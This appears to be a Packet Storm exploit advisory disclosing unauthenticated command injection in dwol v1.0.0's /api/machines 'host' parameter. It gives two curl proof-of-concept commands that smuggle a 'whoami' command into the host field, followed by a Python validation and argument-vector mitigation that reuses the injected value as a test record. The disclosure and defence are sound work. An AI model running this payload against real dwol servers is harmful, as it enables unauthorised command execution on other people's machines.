Description
dwol version 1.0.0 suffers from an unauthenticated command injection vulnerability in the host parameter of the /api/machines endpoint...
Basic Information
ID
PACKETSTORM:219284
Published
Apr 20, 2026 at 00:00
Affected Product
Affected Versions
# Exploit Title: dwol v1.0.0 - Unauthenticated Command Injection
# Date: 2026-04-18
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://github.com/dhjz/dwol
# Software Link: https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip
# Version: 1.0.0
# Tested on: Windows 10, Windows 11
# Description:
dwol v1.0.0 is vulnerable to unauthenticated command injection in the 'host' parameter of the /api/machines endpoint.
# Proof of Concept:
Step 1: Add a malicious machine with an injected command
curl -X POST "http://TARGET_IP:999/api/machines" -H "Content-Type: application/json" -d '{"id":"rce","name":"rce","mac":"00:11:22:33:44:55","host":"127.0.0.1 & whoami > C:\\users\\Public\\whoami.txt","port":9}'
Step 2: Trigger the command execution
curl "http://TARGET_IP:999/api/status"
The file is created in C:\\users\\Public\\
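
# Mitigation example:
The server-side check that closes this class of bug, as an added example (not code from the advisory or from the dwol project): the machine record is validated before it is stored, and the status check is built as an argument vector instead of a shell string. The function names and the ping command are assumptions; the advisory does not show which command dwol runs with the host value.

```python
import ipaddress
import re

# One DNS label per RFC 1123: letters, digits, hyphen, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")
_MAC = re.compile(r"[0-9A-Fa-f]{2}([:-][0-9A-Fa-f]{2}){5}")


def is_valid_host(value):
    """Accept only an IP literal or an RFC 1123 hostname; nothing else."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    # Spaces, '&', '|', '>', quotes and newlines all fail the label pattern.
    return all(_LABEL.fullmatch(label) for label in value.split("."))


def validate_machine(record):
    """Return the names of invalid fields in a machine record (empty = valid)."""
    errors = []
    if not is_valid_host(record.get("host")):
        errors.append("host")
    mac = record.get("mac")
    if not (isinstance(mac, str) and _MAC.fullmatch(mac)):
        errors.append("mac")
    port = record.get("port")
    if isinstance(port, bool) or not isinstance(port, int) or not 0 < port < 65536:
        errors.append("port")
    return errors


def ping_argv(host):
    """Build the reachability check as an argument vector, never a shell string."""
    if not is_valid_host(host):
        raise ValueError("rejected host value")
    # Assumed command: Windows ping, one echo request. Pass this list to
    # subprocess.run(argv, shell=False) so no command interpreter parses it.
    return ["ping", "-n", "1", host]


# Constructed records: one benign, one carrying the host value from the PoC.
GOOD = {"id": "nas", "name": "nas", "mac": "00:11:22:33:44:55",
        "host": "192.168.1.20", "port": 9}
BAD = dict(GOOD, host="127.0.0.1 & whoami > C:\\users\\Public\\whoami.txt")
```

Rejecting a leading hyphen in each label also keeps a stored host value from being read as a command-line option by the program it is passed to.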